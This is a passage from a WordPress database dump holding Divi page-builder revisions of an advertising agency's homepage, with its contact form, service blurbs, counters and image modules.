_builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.5.2\" hover_enabled=\"0\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 19:39:10','2020-08-07 19:39:10','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(563,1,'2020-08-07 19:41:05','2020-08-07 19:41:05','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"Why We\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" 